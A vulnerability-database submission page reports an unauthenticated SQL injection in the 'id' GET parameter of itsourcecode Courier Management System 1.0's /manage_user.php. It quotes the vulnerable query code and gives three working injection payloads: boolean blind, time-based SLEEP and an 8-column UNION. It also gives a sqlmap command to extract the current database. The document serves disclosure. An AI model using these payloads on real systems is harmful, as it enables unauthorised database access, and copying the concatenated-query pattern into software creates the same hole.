提交 #818198: itsourcecode Courier Management System 1.0 SQL Injection信息

标题itsourcecode Courier Management System 1.0 SQL Injection
描述A SQL injection vulnerability was found in itsourcecode Courier Management System 1.0. The vulnerability exists in the file /manage_user.php at line 5. The manipulation of the argument "id" via GET parameter leads to SQL injection. No authentication is required to exploit this vulnerability. The attack may be launched remotely. Vulnerable code: $user = $conn->query("SELECT * FROM users where id =".$_GET['id']); The file /manage_user.php contains no session check or login verification before processing user input. Tested injection types: 1. Boolean-based blind: id=(SELECT (CASE WHEN (1679=1679) THEN 1 ELSE (SELECT 2926 UNION SELECT 3592) END)) 2. Time-based blind (5 second delay confirmed): id=1 AND (SELECT 2340 FROM (SELECT(SLEEP(5)))VRZs) 3. UNION query (8 columns): id=-7753 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x71766a7a71,0x75426f454f47726f6659416e4d424474484a69636e4569694d674b6c4c47705145566572516f4c53,0x7171627871),NULL,NULL,NULL,NULL-- - Verified using sqlmap: sqlmap --random-agent --batch -u "http://target/manage_user.php?id=1" --dbms=mysql --current-db. I have already informed the supplier about the relevant loopholes.
来源⚠️ https://lhzzz08.github.io/posts/cveapplication3/
用户
 zzl08 (UID 93909)
提交2026-05-02 17時11分 (1 月前)
管理2026-05-26 18時16分 (24 days later)
状态已接受
VulDB条目365679 [itsourcecode Courier Management System 1.0 /manage_user.php 标识符 SQL注入]
积分20

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!